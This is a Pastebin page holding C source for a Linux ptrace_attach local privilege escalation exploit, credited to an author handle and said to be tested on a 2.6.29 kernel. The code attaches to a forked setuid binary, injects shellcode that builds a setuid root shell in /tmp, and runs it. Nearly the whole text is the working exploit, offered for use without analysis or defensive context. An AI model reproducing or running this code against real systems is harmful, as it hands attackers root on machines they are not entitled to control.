My Pastes
Public Pastes
Layout Width
Share Pastebin
Guest
Public paste!

Untitled

By: a guest | Mar 20th, 2010 | Syntax: None | Size: 2.29 KB | Hits: 91 | Expires: Never
Download | Raw | Embed | Report abuse
Copy text to clipboard
  1. /*
  2. ptrace_attach privilege escalation exploit by s0m3b0dy
  3.  
  4. [*] tested on Gentoo 2.6.29rc1
  5.  
  6. grataz:
  7. Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo...
  8.  
  9. email: s0m3b0dy1 (at) gmail.com
  10. */
  11.  
  12. #include <grp.h>
  13. #include <stdio.h>
  14. #include <fcntl.h>
  15. #include <errno.h>
  16. #include <paths.h>
  17. #include <string.h>
  18. #include <stdlib.h>
  19. #include <signal.h>
  20. #include <unistd.h>
  21. #include <sys/wait.h>
  22. #include <sys/stat.h>
  23. #include <sys/param.h>
  24. #include <sys/types.h>
  25. #include <sys/ptrace.h>
  26. #include <sys/socket.h>
  27. char shellcode[] =
  28. "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99"
  29. "\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
  30. "\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"
  31. "echo \"#include <stdio.h>\nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;";
  32. struct user_regs_struct322 {
  33.         unsigned long ebx, ecx, edx, esi, edi, ebp, eax;
  34.         unsigned short ds, __ds, es, __es;
  35.         unsigned short fs, __fs, gs, __gs;
  36.         unsigned long orig_eax, eip;
  37.         unsigned short cs, __cs;
  38.         unsigned long eflags, esp;
  39.         unsigned short ss, __ss;
  40. };
  41.  
  42. main()
  43. {
  44. struct user_regs_struct322  regs;
  45. struct stat buf;
  46. int i,o;
  47. unsigned long * src;
  48. unsigned long * dst;
  49. char *env[2];
  50. env[0]="/usr/bin/gpasswd";  // some suid file
  51. env[1]=0;
  52. if((o=fork()) == 0)
  53. {
  54. execve(env[0],env,0);
  55. exit(0);
  56. }
  57. if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
  58. {
  59. printf("\n[-] Attach\n");
  60. exit(0);
  61. }
  62.  wait((int *)0);
  63. if (ptrace(PTRACE_GETREGS, o, NULL, &regs) == -1){
  64.                 printf("\n[-] read registers\n");
  65.                 exit(0);
  66. }
  67. printf( "[+] EIP - 0x%08lx\n", regs.eip);
  68. dst= (unsigned long *) regs.eip;
  69. src = (unsigned long *) shellcode;
  70. for(i=0;i<sizeof(shellcode) -1;i+=4)
  71. if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
  72.                        printf("\n[-] write shellcode\n");
  73.                         exit(0);
  74. }
  75. ptrace(PTRACE_CONT, o, 0, 0);
  76. ptrace(PTRACE_DETACH,o,0,0);
  77. printf("[+] Waiting for root...\n");
  78. sleep(2);
  79. if(!stat("/tmp/.exp",&buf))
  80. {
  81. printf("[+] Executing suid shell /tmp/.exp...\n");
  82. execv("/tmp/.exp",0);
  83. }
  84. else
  85. {
  86. printf("[-] Damn no r00t here :(\n");
  87. }
  88. return 0;
  89. }
create new paste | create new version of this paste RAW Paste Data